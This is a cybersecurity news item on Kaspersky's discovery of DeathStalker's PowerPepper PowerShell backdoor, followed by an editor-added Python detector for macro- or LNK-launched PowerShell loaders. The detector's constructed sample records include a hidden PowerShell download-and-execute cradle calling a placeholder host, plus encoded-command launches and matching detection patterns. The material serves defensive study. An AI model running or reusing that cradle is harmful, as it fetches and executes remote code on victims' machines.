
Cybercrime, DeathStalker has developed a new Windows backdoor

Bleeping Computer: Kaspersky discovered the PowerShell-based PowerPepper malware. The backdoor is constantly evolving

DeathStalker has developed a new Windows backdoor, as reported by Bleeping Computer. Kaspersky discovered a previously undocumented Windows PowerShell malware dubbed PowerPepper, developed by the hacker-for-hire cybercrime group. Since its discovery, the malware has been under constant development, with new versions being deployed and its delivery chains adapted to new targets. The payload is an in-memory Windows PowerShell-based backdoor that lets its operators execute shell commands delivered remotely via a command-and-control (C2) server. Its capabilities include several anti-detection tactics such as “mouse movements detection, client’s MAC addresses filtering, Excel application handling, and antivirus products inventory.”

The cybersecurity experts: The implant exploits new obfuscation, execution, and masquerading tricks

According to the cybersecurity experts, the malware is delivered to targets’ computers as malicious attachments or links in spear-phishing emails; these point to documents containing malicious Visual Basic for Applications (VBA) macros that execute PowerPepper and gain persistence on the infected system. “This infection chain varied slightly between July and November 2020: some dropped file names, integrated code or remote links changed, but the logic stayed the same,” Kaspersky Lab researcher Pierre Delcher explained. Its macro-based and LNK-based delivery chains also carry DeathStalker’s fingerprints, employing multiple obfuscation, execution, and masquerading tricks to evade detection. The cybercrime group (aka Deceptikons) is a threat actor whose activity goes back to at least 2012, known for using a wide range of malware strains and complex delivery chains, and for regularly using tactics that help it evade detection.
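The delivery chain described above (an Office document whose VBA macro launches an in-memory PowerShell loader, or an LNK shortcut that does the same) leaves a characteristic trace in process-creation telemetry: an Office application, or explorer.exe for a shortcut, spawning a script host with command-line flags that hide the window, bypass execution policy, or run encoded or downloaded code. The following is an added example from the editor, not code from the article, Kaspersky, or Bleeping Computer, and is not specific to PowerPepper: it applies those general heuristics to constructed Sysmon-style process-creation records. The log format (`Key=Value` fields separated by `|`), the sample lines, and the `example.invalid` URL are all constructed for the example.

```python
"""Flag process-creation events consistent with macro- or LNK-delivered PowerShell loaders.

Editor's example. Records are a constructed key=value format (ParentImage, Image,
CommandLine), modelled loosely on Sysmon Event ID 1; adapt parse_event() to your source.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Office applications whose child processes deserve scrutiny (macro-delivered loaders).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script hosts commonly launched by a malicious macro or shortcut.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Generic command-line heuristics for in-memory / hidden PowerShell execution.
SUSPICIOUS_ARGS = [
    (re.compile(r"-(?:e|en|enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "in-memory invoke-expression"),
    (re.compile(r"downloadstring|net\.webclient|invoke-webrequest", re.I), "remote payload fetch"),
]


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed 'Key=Value|Key=Value' record into a ProcEvent."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return ProcEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, tolerant of either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def assess(event: ProcEvent) -> List[str]:
    """Return the list of heuristic findings for a single event (empty if benign)."""
    findings: List[str] = []
    parent, child = basename(event.parent_image), basename(event.image)
    # Rule 1: Office application spawning a script host (macro-based delivery).
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        findings.append(f"office parent {parent} spawned script host {child}")
    # Rule 2: suspicious PowerShell flags anywhere in a script host's command line
    # (covers both direct launches and cmd.exe /c powershell ... wrappers, and
    # explorer.exe-launched shortcuts, where Rule 1 does not fire).
    if child in SCRIPT_HOSTS:
        for pattern, label in SUSPICIOUS_ARGS:
            if pattern.search(event.command_line):
                findings.append(label)
    return findings


def scan(lines: List[str]) -> Dict[int, List[str]]:
    """Map record index -> findings for every record that triggered at least one rule."""
    results: Dict[int, List[str]] = {}
    for index, line in enumerate(lines):
        findings = assess(parse_event(line))
        if findings:
            results[index] = findings
    return results


# Constructed sample records: 0 and 2 mimic macro-launched loaders, 3 mimics an
# LNK-launched loader, 1 is a benign scheduled script. The encoded blob in record 0
# is "IEX" in UTF-16LE base64, used only to exercise the encoded-command rule.
SAMPLE_LOG = [
    r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -w hidden -ep bypass -enc SQBFAFgA",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -NoProfile -File C:\scripts\backup.ps1",
    r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /c powershell -nop -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/p.txt'))",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -w hidden -nop -ep bypass -e SQBFAFgA",
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(f"record {idx}: " + "; ".join(hits))
```

Rule 1 alone is a strong signal for the macro chain, but it misses the LNK chain, where the parent is explorer.exe; the command-line heuristics in Rule 2 catch that case and the `cmd.exe /c powershell ...` wrapper, at the cost of more tuning against legitimate administrative scripts, which is why the benign record with `-NoProfile -File` produces no findings.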
